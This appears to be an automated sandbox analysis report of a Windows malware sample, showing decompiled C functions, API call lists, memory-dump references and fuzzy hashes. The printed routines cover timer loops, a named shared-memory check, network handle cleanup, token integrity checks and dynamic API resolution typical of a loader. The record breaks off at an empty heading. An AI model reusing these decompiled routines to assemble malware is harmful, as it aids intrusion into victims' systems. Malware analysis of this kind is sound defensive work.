0x03c4ad14
0x03c4ad1e
0x03c4ad28
0x03c4ad2d
0x03c4ad2f
0x03c4ad39
0x03c4ad3c
0x03c4ad3f
0x03c4ad45
0x03c4ad47
0x03c4ad47
0x03c4ad4a
0x03c4ad4d
0x03c4ad52
0x03c4ad56
0x03c4ad69
0x03c4ad6b
0x03c4ae13
0x03c4ae13
0x03c4ae1a
0x03c4ae1d
0x03c4ae27
0x03c4ae27
0x03c4ae2b
0x03c4aea9
0x03c4aeac
0x03c4aeae
0x03c4aeae
0x03c4aeb5
0x03c4aeb7
0x03c4aec1
0x03c4aec4
0x03c4aec7
0x03c4aec7
0x00000000
0x03c4ae2d
0x03c4ae30
0x03c4ae5e
0x03c4ae68
0x03c4ae6c
0x03c4ae74
0x03c4ae77
0x03c4ae7e
0x03c4ae88
0x03c4ae88
0x03c4ae8c
0x03c4ae91
0x03c4aea0
0x03c4aea6
0x03c4aea6
0x03c4ae8c
0x00000000
0x03c4ae37
0x03c4ae3a
0x03c4ae42
0x03c4ae57
0x03c4ae5c
0x00000000
0x00000000
0x03c4ae5c
0x00000000
0x03c4ae42
0x03c4ae30
0x03c4ae2b
0x03c4ad71
0x03c4ad78
0x03c4ad88
0x03c4ad8b
0x03c4ad91
0x03c4ad95
0x03c4add8
0x03c4ade4
0x03c4ae0d
0x03c4ade6
0x03c4adea
0x03c4adf0
0x03c4adf8
0x03c4adfa
0x03c4adfd
0x03c4ae03
0x03c4ae05
0x03c4ae05
0x03c4adf8
0x03c4adea
0x00000000
0x03c4ade4
0x03c4ad9d
0x03c4ada0
0x03c4ada7
0x03c4adb7
0x03c4adba
0x03c4adca
0x00000000
0x03c4add0
0x03c4adb1
0x03c4adb5
0x00000000
0x00000000
0x00000000
0x03c4adb5
0x03c4ad82
0x03c4ad86
0x00000000
0x00000000
0x00000000
0x03c4ad86
0x03c4ad5f
0x03c4ad63
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 03C4AD0E
LoadLibraryA.KERNELBASE(?), ref: 03C4AD8B
GetLastError.KERNEL32 ref: 03C4AD97
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 03C4ADCA

Strings

$, xrefs: 03C4ACE3

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: b56a01fccb9ca687f8c2bfe8d8a0f143150cfd1c7b32cca716b6e5141a0cedbc
Instruction ID: 591b540f4b7de6bafb8a7ffe276c8a9e4036c497d345f892c81518baa5fa4f99
Opcode Fuzzy Hash: b56a01fccb9ca687f8c2bfe8d8a0f143150cfd1c7b32cca716b6e5141a0cedbc
Instruction Fuzzy Hash: 00813E79A40205AFDB21DFA9D884BAEB7F5FF48310F148069E915EB340EB70EA55CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00417EFF, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

_check_managed_app.LIBCMTD ref: 00417F0D

Part of subcall function 0041C070: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,?,00417F1A), ref: 0041C086

_fast_error_exit.LIBCMTD ref: 00417F20

Part of subcall function 00418070: __FF_MSGBANNER.LIBCMTD ref: 0041807E
Part of subcall function 00418070: __NMSG_WRITE.LIBCMTD ref: 00418087
Part of subcall function 00418070: ___crtExitProcess.LIBCMTD ref: 00418094

_fast_error_exit.LIBCMTD ref: 00417F33
__RTC_Initialize.LIBCMTD ref: 00417F45
__ioinit.LIBCMTD ref: 00417F51
___crtGetEnvironmentStringsW.LIBCMTD ref: 00417F6F
___wsetargv.LIBCMTD ref: 00417F79
__wsetenvp.LIBCMTD ref: 00417F8C
__cinit.LIBCMTD ref: 00417FA1
__wwincmdln.LIBCMTD ref: 00417FBE

Strings

VA, xrefs: 00417F15

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: ___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___wsetargv__cinit__ioinit__wsetenvp__wwincmdln_check_managed_app
String ID: VA
API String ID: 4090165920-151723848
Opcode ID: eab783ceb76d3199435bef90ec3380e4805467d95e7220d9e6b01474bb8c6cd5
Instruction ID: 48da8bb8abfdd293156cb3d0f875f77ef2f080d5bac96ed810895ed9ac74d91c
Opcode Fuzzy Hash: eab783ceb76d3199435bef90ec3380e4805467d95e7220d9e6b01474bb8c6cd5
Instruction Fuzzy Hash: D93147B5E4430C9AEB10BBB29D577DE76B0AF0470CF14002FF9096B282EA7D55C5C65A

Uniqueness

Uniqueness Score: -1.00%

Function 03C47C3D, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E03C47C3D(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x3c4d240);
					_v20 = 0;
					_v16 = 0;
					L03C4AF6E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x3c4d26c; // 0x1b8
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x3c4d24c = 5;
						} else {
							_t68 = E03C45319(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x3c4d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E03C42C58(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E03C49870(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x3c4d244);
							goto L21;
						} else {
							__eflags =  *0x3c4d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E03C45433();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x3c4d248);
								L21:
								L03C4AF6E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x3c4d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x03c47c3d
0x03c47c4f
0x03c47c52
0x03c47c5e
0x03c47c64
0x03c47c69
0x03c47dd0
0x03c47c6f
0x03c47c6f
0x03c47c71
0x03c47c76
0x03c47c77
0x03c47c7d
0x03c47c80
0x03c47c83
0x03c47c91
0x03c47c9c
0x03c47c9f
0x03c47ca1
0x03c47cae
0x03c47cb8
0x03c47cba
0x03c47cbf
0x03c47cc4
0x03c47ccf
0x03c47ccf
0x03c47cc6
0x03c47cc6
0x03c47ccd
0x00000000
0x00000000
0x03c47ccd
0x03c47cd9
0x00000000
0x03c47cdc
0x03c47ce0
0x03c47ceb
0x03c47ceb
0x03c47cf2
0x03c47cfb
0x03c47d02
0x03c47d0b
0x03c47d0e
0x03c47d11
0x03c47d16
0x03c47d1b
0x00000000
0x00000000
0x03c47d1d
0x03c47d20
0x03c47d23
0x03c47d26
0x00000000
0x03c47d28
0x03c47d37
0x03c47d37
0x00000000
0x03c47d65
0x03c47d65
0x03c47d6a
0x03c47d89
0x03c47d8b
0x03c47d90
0x03c47d91
0x00000000
0x03c47d6c
0x03c47d6c
0x03c47d72
0x00000000
0x03c47d74
0x03c47d74
0x03c47d79
0x03c47d7b
0x03c47d80
0x03c47d81
0x03c47d97
0x03c47d97
0x03c47d9f
0x03c47daa
0x03c47dad
0x03c47db8
0x03c47dba
0x03c47dbd
0x03c47dbf
0x00000000
0x03c47dc5
0x00000000
0x03c47dc5
0x03c47dbf
0x03c47d72
0x00000000
0x03c47d6a
0x03c47d3a
0x03c47d3c
0x03c47d3f
0x03c47d40
0x03c47d40
0x03c47d44
0x03c47d4e
0x03c47d4e
0x03c47d54
0x03c47d57
0x03c47d57
0x03c47d5d
0x03c47d5d
0x03c47dda
0x00000000

APIs

memset.NTDLL ref: 03C47C52
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 03C47C5E
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 03C47C83
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 03C47C9F
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03C47CB8
HeapFree.KERNEL32(00000000,00000000), ref: 03C47D4E
CloseHandle.KERNEL32(?), ref: 03C47D5D
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 03C47D97
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,03C4312C,?), ref: 03C47DAD
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03C47DB8

Part of subcall function 03C45319: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04759368,00000000,?,7519F710,00000000,7519F730), ref: 03C45368
Part of subcall function 03C45319: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,047593A0,?,00000000,30314549,00000014,004F0053,0475935C), ref: 03C45405
Part of subcall function 03C45319: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,03C47CCB), ref: 03C45417

GetLastError.KERNEL32 ref: 03C47DCA

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 5f097be60a6244a1396b7b40394ffbdc276528b03e66fc4f259372780d2732ab
Instruction ID: b6f0ed3ab93cd2acdd0c82a6dc4728bb5a9bb6afabcbce1acc9546a20f035fd7
Opcode Fuzzy Hash: 5f097be60a6244a1396b7b40394ffbdc276528b03e66fc4f259372780d2732ab
Instruction Fuzzy Hash: 21516CB5901228BFDB20EF95DC44EEEBFB8EF49720F148615F421EA194D7709A40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03C48E0D, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E03C48E0D(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L03C4AF68();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x3c4d2a8; // 0xb0a5a8
				_t5 = _t13 + 0x3c4e87e; // 0x4758e26
				_t6 = _t13 + 0x3c4e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L03C4AC0A();
				_t17 = CreateFileMappingW(0xffffffff, 0x3c4d2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x03c48e0d
0x03c48e15
0x03c48e19
0x03c48e1f
0x03c48e24
0x03c48e29
0x03c48e2c
0x03c48e2f
0x03c48e34
0x03c48e35
0x03c48e38
0x03c48e3d
0x03c48e44
0x03c48e4e
0x03c48e50
0x03c48e51
0x03c48e54
0x03c48e70
0x03c48e76
0x03c48e7a
0x03c48ec8
0x03c48e7c
0x03c48e89
0x03c48e99
0x03c48ea1
0x03c48eb3
0x03c48eb7
0x00000000
0x00000000
0x03c48ea3
0x03c48ea6
0x03c48eab
0x03c48ead
0x03c48ead
0x03c48e8b
0x03c48e8d
0x03c48eb9
0x03c48eba
0x03c48eba
0x03c48e89
0x03c48ecf

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,03C42FFF,?,?,4D283A53,?,?), ref: 03C48E19
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 03C48E2F
_snwprintf.NTDLL ref: 03C48E54
CreateFileMappingW.KERNELBASE(000000FF,03C4D2AC,00000004,00000000,00001000,?), ref: 03C48E70
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,03C42FFF,?,?,4D283A53), ref: 03C48E82
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 03C48E99
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,03C42FFF,?,?), ref: 03C48EBA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,03C42FFF,?,?,4D283A53), ref: 03C48EC2

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: ad0199697ff1e0b9ace98fd8ad6c383069a46a86b2b5118b998a2fd25f5846e7
Instruction ID: e8dcec8c3a9d0a0a2d0c36843082d63385697d2d2043c1feba3b97548d893cb4
Opcode Fuzzy Hash: ad0199697ff1e0b9ace98fd8ad6c383069a46a86b2b5118b998a2fd25f5846e7
Instruction Fuzzy Hash: DA21E4BAA41304BBD721FFA8CC05F8E77B9AB44710F154120FA05EB2D0D7719A058B91

Uniqueness

Uniqueness Score: -1.00%

Function 03C458DB, Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E03C458DB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E03C429C0(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E03C48B22(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E03C48B22(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E03C48B22(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E03C48B22(_t46);
				}
				return _t24;
			}

0x03c458db
0x03c458db
0x03c458dd
0x03c458df
0x03c458e6
0x03c458ed
0x03c458ed
0x03c458f2
0x03c458f5
0x03c458fc
0x03c45905
0x03c45909
0x03c4590e
0x03c4590e
0x03c45910
0x03c45915
0x03c45919
0x03c4591e
0x03c4591e
0x03c45920
0x03c45925
0x03c45929
0x03c4592e
0x03c4592e
0x03c45930
0x03c4593b
0x03c4593e
0x03c4593e
0x03c45940
0x03c45945
0x03c45948
0x03c45948
0x03c4594a
0x03c45951
0x03c45954
0x03c45959
0x03c4595c
0x03c4595c
0x03c4595f
0x03c45964
0x03c45967
0x03c45967
0x03c4596c
0x03c45970
0x03c45973
0x03c45973
0x03c45978
0x03c4597d
0x00000000
0x03c45980
0x03c45987

APIs

InternetSetStatusCallback.WININET(?,00000000), ref: 03C45909
InternetCloseHandle.WININET(?), ref: 03C4590E
InternetSetStatusCallback.WININET(?,00000000), ref: 03C45919
InternetCloseHandle.WININET(?), ref: 03C4591E
InternetSetStatusCallback.WININET(?,00000000), ref: 03C45929
InternetCloseHandle.WININET(?), ref: 03C4592E
CloseHandle.KERNEL32(?,00000000,00000102,?,?,03C493DC,?,?,00000000,00000000,751881D0), ref: 03C4593E
CloseHandle.KERNEL32(?,00000000,00000102,?,?,03C493DC,?,?,00000000,00000000,751881D0), ref: 03C45948

Part of subcall function 03C429C0: WaitForMultipleObjects.KERNEL32(00000002,03C4A923,00000000,03C4A923,?,?,?,03C4A923,0000EA60), ref: 03C429DB

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
String ID:
API String ID: 2824497044-0
Opcode ID: 97f9ab66af51f2ea1a53eb42b8bf2d99894c2409ee0da75624ed004d0e39dc60
Instruction ID: 9d984695723db1d8aa2612ce346c5326dcd355130342b9eb82a8990c98f320f8
Opcode Fuzzy Hash: 97f9ab66af51f2ea1a53eb42b8bf2d99894c2409ee0da75624ed004d0e39dc60
Instruction Fuzzy Hash: 6C110D7A6007486BC630EEAAEC84C1BF7E9BF562207994D19E086DB510CB31FD458A60

Uniqueness

Uniqueness Score: -1.00%

Function 01FE003C, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 01FE024D

Strings

kernel32.dll, xrefs: 01FE008F, 01FE0095
cess, xrefs: 01FE018D

Memory Dump Source

Source File: 00000000.00000002.517164137.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FE0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: 2c28630d7404b2cebd95473b23338d5bfba753e1402e26700cf72dbee5ae5afd
Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: AF526975A01229DFDB64CF58C984BACBBB1BF09304F1480E9E94DAB351DB71AA85CF14

Uniqueness

Uniqueness Score: -1.00%

Function 03C4A2C6, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C4A2C6(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x3c4d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E03C41525(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E03C48B22(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x03c4a2d3
0x03c4a2da
0x03c4a2e1
0x03c4a2f5
0x03c4a300
0x03c4a318
0x03c4a325
0x03c4a328
0x03c4a32d
0x03c4a338
0x03c4a33c
0x03c4a34b
0x03c4a34f
0x03c4a36b
0x03c4a36b
0x03c4a36f
0x03c4a36f
0x03c4a374
0x03c4a378
0x03c4a37e
0x03c4a37f
0x03c4a386
0x03c4a38c

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 03C4A2F8
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 03C4A318
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03C4A328
CloseHandle.KERNEL32(00000000), ref: 03C4A378

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 03C4A34B
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 03C4A353
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 03C4A363

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: a3fe677c394bc5d5933033f7aca6c433504b9bb5c1299a89155e1416fa054965
Instruction ID: 97f58a055b933710368b53149cc6c1f738b0ca0f8f689f63b74faea4aa8606d3
Opcode Fuzzy Hash: a3fe677c394bc5d5933033f7aca6c433504b9bb5c1299a89155e1416fa054965
Instruction Fuzzy Hash: C1213E79900208FFEB10EFA4DC44EEEBBB9EB44314F144065E911E6251D7719E45EF60

Uniqueness

Uniqueness Score: -1.00%

Function 004002FB, Relevance: 10.1, APIs: 6, Instructions: 1083libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004016EE: HeapAlloc.KERNEL32(00000000,?,004019CF,00000030,?,00000000), ref: 004016FA

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401DBA,?,?,?,?,?,00000002,?,?), ref: 00401024
GetProcAddress.KERNEL32(00000000,?), ref: 00401046
GetProcAddress.KERNEL32(00000000,?), ref: 0040105C
GetProcAddress.KERNEL32(00000000,?), ref: 00401072
GetProcAddress.KERNEL32(00000000,?), ref: 00401088
GetProcAddress.KERNEL32(00000000,?), ref: 0040109E

Part of subcall function 00401C90: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00401CED
Part of subcall function 00401C90: memset.NTDLL ref: 00401D0F

Memory Dump Source

Source File: 00000000.00000002.516786693.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.516802279.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.516809873.0000000000406000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 7a3b1c4486e7825f874286bd3029e9214ba935fa635daab2b42e5e91bdaef23d
Instruction ID: b9c5f878a907f19a9579b0e7cfff4d151dd516fd9ab73dbb569db27ee4dd23d2
Opcode Fuzzy Hash: 7a3b1c4486e7825f874286bd3029e9214ba935fa635daab2b42e5e91bdaef23d
Instruction Fuzzy Hash: FB3167B060078AAFD711CF6ACD84867BBFCEF58344704446AE649EB6A1DB74E9418F24

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401000(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E004016EE(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x403104 + 0x404014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x403104 + 0x404151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E004017CB(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x403104 + 0x404161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x403104 + 0x404174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x403104 + 0x404189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x403104 + 0x40419f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E00401C90(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x0040100e
0x00401012
0x004010d3
0x00401018
0x00401030
0x0040103f
0x00401046
0x00401048
0x0040104d
0x004010cb
0x004010cc
0x0040104f
0x0040105c
0x0040105e
0x00401063
0x00000000
0x00401065
0x00401072
0x00401074
0x00401079
0x00000000
0x0040107b
0x00401088
0x0040108a
0x0040108f
0x00000000
0x00401091
0x0040109e
0x004010a0
0x004010a5
0x00000000
0x004010a7
0x004010ad
0x004010b3
0x004010b8
0x004010bd
0x004010c2
0x00000000
0x004010c4
0x004010c7
0x004010c7
0x004010c2
0x004010a5
0x0040108f
0x00401079
0x00401063
0x0040104d
0x004010e1

APIs

